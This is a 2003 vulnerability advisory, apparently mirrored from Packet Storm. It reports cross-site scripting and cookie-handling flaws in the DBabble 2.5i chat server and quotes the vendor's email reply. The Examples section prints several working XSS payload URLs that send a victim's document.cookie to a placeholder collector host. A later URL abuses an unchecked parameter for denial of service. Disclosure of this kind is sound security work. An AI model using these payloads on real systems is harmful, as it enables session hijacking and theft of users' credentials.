Lucene search

K

dbabble.txt

πŸ—“οΈΒ 18 Sep 2003Β 00:00:00Reported byΒ Dr. InsaneTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 30Β Views

DBabble 2.5i has XSS and cookie security issues; vendor promised a fix soon.

Show more
Code
`*first published on: http://members.lycos.co.uk/r34ct/  
---------------------------------------------------------------------------------------------  
DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory  
----------------------------------------------------------------------------------------------------------------------  
  
DBabble 2.5i XSS/Cookie Problem  
12/09/2003  
-by dr_insane ([email protected])  
-http://members.lycos.co.uk/r34ct/  
  
  
-------------------  
Vendor Information:  
-------------------  
Homepage: http://www.netwinsite.com/  
Vendor informed  
Vender Response : None (yet?)  
  
Here is the answer from the Vendor:  
From [email protected] Tue Sep 16 00 : 39:06 2003   
Return-Path : <[email protected]>   
Received : from netwin.co.nz (smtp.netwin.co.nz [210.54.249.114]) by monster.phaistosnetworks.gr (8.12.9/8.12.5) with ESMTP id h8FLd2U5021801 for <[email protected]>; Tue, 16 Sep 2003 00:39:04 +0300   
Received : from matt2 (unverified [10.0.0.26]) by netwin.co.nz (SurgeMail 1.5a) with ESMTP id 839253 for <[email protected]>; Tue, 16 Sep 2003 09:37:04 +1200   
from : Matt Kearse <[email protected]>   
X-Mailer : The Bat! (v1.63 Beta/7)   
Reply-To : [email protected]   
Organization : NetWin Ltd   
X-Priority : 3 (Normal)   
Message-ID : <[email protected]>   
To : "xxxx xxxxxx" <[email protected]>   
Topic : Re: DBabble 2.5i- Instant Messaging for the office XSS/Cookie problems Advisory   
In-Reply-To : <[email protected]>   
References : <[email protected]>   
MIME-Version : 1.0   
Content-type : text/plain; charset=ISO-8859-7   
Content-transfer-encoding : 8bit   
X-Server : High Performance Mail Server - http://surgemail.com   
  
Hi ,  
  
Thanks for letting us know about these problems. We should have a  
fixed version available within a day or two. I will let you know when  
we do.  
  
Regards,  
Matt Kearse.  
  
-------------------  
Affected Versions/systems:  
-------------------  
(Version 2.5i is vulnerable. Older versions may be vulnerable too)  
  
Dbabble Solaris (Sparc)   
Dbabble Linux libc6/redhat 5/6  
Dbabble Free BSD   
Dbabble MacOS X  
Dbabble Freebsd  
Dbabble AIX  
Dbabble Windows NT/2000/XP/95/98/ME  
  
NO VULNERABLE VERSIONS  
- ?  
-------------------  
Description:  
-------------------  
DBabble is a chat, discussion, and instant messaging server and client, which allows users to send encrypted instant messages, have private conversations, and create and participate in private or public chat rooms and discussions. Users communicate with the chat server using either a web browser, or a client for Windows 95/98/ME/NT/2000/XP. Users can communicate with ICQ, MSN, Yahoo, and AIM (AOL) users, send instant messages to groups of users, receive email copies of their instant messages or new discussion group articles, and they can send and receive instant messaging from email addresses and mobile phones. Discussion groups/forums can optionally be linked to external usenet (NNTP) groups and/or made available to NNTP clients. A single DBabble chat server can support thousands of simultaneous online users and can optionally be isolated from outside communication.  
  
I encountered XSS security holes in some scripts of Dbabble 2.5i and some other problems.  
  
  
-----------------------------  
Vulnerable Scripts/Exploit:  
--------------------------------------------  
(1)  
  
http://[HOST]:8132/dbabble?cmd=[XSS ATTACK]  
http://[HOST]:8132/dbabble?[XSS ATTACK]   
http://[HOST]:8132/dbabble?cmd=cmd_newuser&lang=English&template=Standard (Fields name,password and Display name are vulnerable to XSS ATTACK)  
  
Another problem is that Dbabble uses cookies. So it is possible for someone to steal them using XSS  
attacks and some javascript.  
  
Examples:  
  
http://[HOST]/dbabble?cmd="><script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?  
'%20+document.cookie</script>  
  
http://[HOST]/dbabble?cmd=<script>document.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'  
+document.cookie</script>  
  
http://[HOST]/dbabble?cmd=><script&gtdocument.location='http://www.yourhost.org/cgi-bin/cookie.cgi?'  
+document.cookie</script>  
  
These are the examples of "evil" Javascript . These Javascript examples gather  
the users cookie and then send a request to the yourhost.org website with the cookie in the  
query .  
  
When you access a hostile link with a xss attack in those scripts youur   
browser will execute the script commands.  
This can be use for steal cookies , authentication tokens and other   
private information.  
If your browser is vulnerable to other holes ( like MSIE ;-) you can   
have more problems...  
  
  
(2)  
Another problem is that the parametre 'display' doesn't check the values it can accept. This can  
lead to DOS attacks and other problems.  
  
http:[HOST]/dbabble?tok=1_1_840327879_1094951187&cmd=u_friends_del&hid=1&uid=3&display=WHATEVER!!!!  
  
  
  
-----------------  
| SoLuTiOnS |  
-----------------  
  
Update to the next Version:>  
  
-----------  
| CONTACT |  
-----------  
  
Dr_insane  
[email protected]  
http://members.lycos.co.uk/r34ct/  
Greece  
  
  
  
  
  
  
----------------------------  
Dr_Insane  
members.lycos.co.uk/r34ct/  
----------------------------  
  
______________________________________________________________________________________  
http://mobile.pathfinder.gr - Pathfinder Mobile logos & Ringtones!   
http://www.pathfinder.gr - ÄùñΓ₯Üí mail Ñðü ôïí Pathfinder!  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Sep 2003 00:00Current
7.4High risk
Vulners AI Score7.4
30
.json
Report